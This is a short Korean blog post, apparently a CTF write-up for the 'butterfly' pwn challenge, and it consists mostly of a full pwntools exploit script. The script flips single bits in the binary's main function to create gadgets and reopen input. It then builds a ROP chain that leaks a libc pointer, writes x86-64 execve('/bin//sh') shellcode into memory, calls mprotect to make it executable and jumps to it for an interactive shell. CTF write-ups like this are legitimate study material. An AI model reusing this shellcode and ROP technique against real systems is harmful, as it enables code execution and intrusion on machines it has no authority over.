1bit flip 을 하게 해주는 문제.
main 함수에 명령어 몇개 바꿔서 ROP 하면됨.
hahah 님의 빠른 풀이전략을 듣고 익스코드 작성.
from pwn import *
import time
context.arch = 'amd64' # i386 / arm
SH = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
# recvuntil sendline, pack, recv, send
r = remote('butterfly.pwning.xxx', 9999)
#r = process(['stdbuf', '-o', '0', '-i', '0', './butterfly'])
raw_input('attach')
# start pwn.
# 0x48 -> 0x08
main = 0x400788
TARGET1 = '33571614'.ljust(40, ' ') #33571608 + ?
TARGET1 += pack(main)
print r.recv(1000)
r.sendline(TARGET1)
# create rdx gadget
TARGET22 = '33571616'.ljust(40, ' ')
TARGET22 += pack(main)
print r.recv(1000)
r.sendline(TARGET22)
# change fgets size
TARGET2 = '33570343'.ljust(40, ' ')
TARGET2 += pack(main)
print r.recv(1000)
r.sendline(TARGET2)
# jne -> je
TARGET32 = '33571544'.ljust(40, ' ')
'''
pattern 5fc3 found at 0x4008f3
POP RDI; RET;
0x4007c8 <main+208>: pop %rsi
0x4007c9 <main+209>: pop %r15
0x4007cb <main+211>: pop %rbp
0x4007cc <main+212>: retq
0x00000000004007c6 <+206>: pop %rdx
0x00000000004007c7 <+207>: pop %r14
0x00000000004007c9 <+209>: pop %r15
0x00000000004007cb <+211>: pop %rbp
0x00000000004007cc <+212>: retq
'''
fgets = 0x400640
puts = 0x400600
stdin_got = 0x600d30
poprdi = 0x4008f3
poprsi = 0x400866
poprdx = 0x400864
mprotect = 0x400660
raw_input('4')
# start full ROP. fgets
TARGET32 += pack(poprdi)
TARGET32 += pack(stdin_got)
TARGET32 += pack(puts)
TARGET32 += pack(main)
print r.recv(1000)
raw_input()
r.sendline(TARGET32)
raw_input()
leak = r.recv(1000)
print leak
stdin = int(leak.split('\n')[1][::-1].encode('hex'), 16)
print 'stdin : {0}'.format(hex(stdin))
TARGET3 = '33571864'.ljust(40, '#')
TARGET3 += pack(poprdi)
TARGET3 += pack(0x600800) # shellcode location
TARGET3 += pack(poprsi)
TARGET3 += pack(0x80)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(poprdx)
TARGET3 += pack(stdin)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(fgets)
TARGET3 += pack(main)
r.sendline(TARGET3)
time.sleep(1)
r.sendline(SH)
time.sleep(.5)
print r.recv(1000)
time.sleep(.5)
TARGET4 = '33571864'.ljust(40, '#')
TARGET4 += pack(poprdi)
TARGET4 += pack(0x600000)
TARGET4 += pack(poprsi)
TARGET4 += pack(0x1000)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(poprdx)
TARGET4 += pack(7)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(mprotect)
TARGET4 += pack(0x600800) # jump to shellcode
r.sendline(TARGET4)
# get shell?
r.interactive()
'Games > CTF' 카테고리의 다른 글
| ASIS CTF 2016 books (0) | 2016.05.11 |
|---|---|
| ASIS CTF 2016 feap (0) | 2016.05.11 |
| PlaidCTF 2016 fixedpoint (0) | 2016.04.19 |
| PlaidCTF 2016 pzip (0) | 2016.04.19 |
| CAMPCTF 2015 dkm (0) | 2015.11.19 |